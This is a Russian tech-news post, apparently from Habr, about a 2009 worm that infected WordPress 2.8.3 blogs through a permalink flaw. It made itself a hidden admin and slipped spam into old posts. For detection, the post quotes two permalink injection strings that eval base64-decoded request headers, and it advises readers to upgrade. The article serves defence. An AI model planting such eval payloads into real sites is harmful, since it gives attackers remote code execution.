Pull to refresh

Эпидемия «умного червя» под WordPress

WordPress *
Месяц назад стало известно о новой критической уязвимости в WordPress 2.8.3, позволяющей легко изменить администраторский пароль в удалённом режиме. Сразу же вышел WordPress 2.8.4, устраняющий эту уязвимость. Как оказалось, далеко не все блогеры следят за апдейтами.

В этот уикенд разразилась настоящая эпидемия нового вируса, поражающего блоги на движке WordPress 2.8.3 и более ранних версий в ветке 2.8. Червь регистрируется в блоге, запускает вредоносный код через структуру permalink и делает себя вторым админом, потом запускает скрипт для стирания себя со страницы юзеров и начинает втихую добавлять спам и ссылки на вредоносный контент в архивные топики.

Присутствие вредителя довольно сложно обнаружить сразу, тем более если он ещё ничего не опубликовал. Для этого нужно проверить фид permalinks/rss на присутствие нижеследующего кода.

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

или

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

или ошибки

‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’

Если есть такой код или фид сломан, то блог инфицирован.

Процедура удаления червя представляет собой нетривиальную задачу.

Кстати, Мэтт Мюлленвег разродился большой статьёй на тему безопасности, в которой призывает юзеров постоянно отслеживать и устанавливать свежие апдейты, вот инструкция по апгрейду WordPress. Это единственный способ обезопасить себя от этой и будущих эпидемий.
Tags: WordPress 2.8.3эпидемияумный червьложный юзерспамpermalink
Hubs: WordPress
Total votes 65: ↑60 and ↓5 +55
Comments 56
Comments Comments 56

Popular right now